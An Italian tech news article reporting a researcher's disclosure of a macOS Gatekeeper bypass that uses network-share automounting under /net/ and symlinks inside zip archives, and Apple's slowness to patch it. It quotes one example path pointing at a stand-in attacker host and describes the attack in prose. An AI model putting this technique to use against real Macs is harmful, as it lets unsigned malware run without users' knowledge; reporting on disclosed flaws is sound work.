È facile installare un'app dannosa su un Mac. Apple non ha corretto l'errore nemmeno dopo tre mesi

27. 5. 2019

Il ricercatore di sicurezza Filippo Cavallarin ha pubblicato un avviso sul bug in macOS 10.14.5 sul suo blog. Questa consiste nella possibilità di aggirare completamente le misure di sicurezza di Gatekeeper. Secondo Cavallarin, ha segnalato l'errore ad Apple già nel febbraio di quest'anno, ma l'azienda non lo ha risolto nell'ultimo aggiornamento.

Gatekeeper è stato sviluppato da Apple e incorporato per la prima volta nel suo sistema operativo desktop nel 2012. Si tratta di un meccanismo che impedisce l'esecuzione di un'applicazione all'insaputa e al consenso dell'utente. Dopo aver scaricato un'app, Gatekeeper ne controlla automaticamente il codice per verificare se il software è firmato correttamente da Apple.

Nel suo post sul blog, Cavallarin afferma che Gatekeeper, per impostazione predefinita, considera sia l'archiviazione esterna che le condivisioni di rete come luoghi sicuri. Qualunque applicazione che risieda in questi target potrà quindi essere lanciata automaticamente senza dover passare attraverso il controllo del Gatekeeper. È questa caratteristica che può essere sfruttata per lanciare software dannoso all'insaputa dell'utente.

Un aspetto che consente l'accesso non autorizzato è la funzionalità di montaggio automatico, che consente agli utenti di montare automaticamente una condivisione di rete semplicemente specificando un percorso che inizia con "/net/". Cavallarin cita ad esempio il percorso "ls /net/evil-attacker.com/sharedfolder/" che può far sì che il sistema operativo carichi il contenuto di una cartella "sharefolder" in una posizione remota che può essere potenzialmente dannosa.

Puoi guardare il modo in cui funziona la minaccia nel video:

Un altro fattore è il fatto che se viene condiviso un archivio zip contenente uno specifico collegamento simbolico che porta alla funzione di montaggio automatico, non verrà controllato da Gatekeeper. In questo modo, la vittima può facilmente scaricare l'archivio dannoso e decomprimerlo, consentendo all'aggressore di eseguire praticamente qualsiasi software sul Mac all'insaputa dell'utente. Anche il Finder, che nasconde alcune estensioni per impostazione predefinita, ha la sua parte di questa vulnerabilità.

Cavallarin afferma sul suo blog che Apple ha attirato l'attenzione sulla vulnerabilità del sistema operativo macOS il 22 febbraio di quest'anno. Ma a metà maggio Apple ha smesso di comunicare con Cavallarin, quindi Cavallarin ha deciso di rendere pubblica la cosa.

Fonte: FCVL

Temi: magazzinaggio, automatico, MacOS, video, impostazioni, funzione, utente, aplikace, Apple

Discussione dell'articolo

Il tuo nome

Il tuo commento

Compilando i dati di cui sopra, riconosco che la società TEXT FACTORY s.r.o., con sede a Brno, Durďákova 336/29, Černá Pole, CAP: 613 00, ID: 06157831, registrata presso il Tribunale regionale di Brno, sezione C , inserto 100399, tratterà i miei dati personali forniti nel modulo di registrazione da me compilato sulla base degli interessi legittimi di TEXT FACTORY s.r.o. ai sensi dell'articolo 6 paragrafo 1 lettera f) GDPR e per adempiere ad obblighi di legge (articolo 6, paragrafo 1, lettera c) GDPR), per le seguenti finalità: la necessità di garantire l'autorizzazione dei visitatori dei siti web gestiti da TEXT FACTORY s.r.o. a contribuire attivamente ad articoli pubblicati o oggetto di discussione forum ed esercitare i diritti di TEXT FACTORY s.r.o. in qualità di amministratore di questi forum di discussione. Maggiori informazioni sul trattamento dei dati personali e sui diritti sono reperibili in Lezioni sulla protezione dei dati personali. l'intero testo

Potrebbe essere ti interessa

Imparentato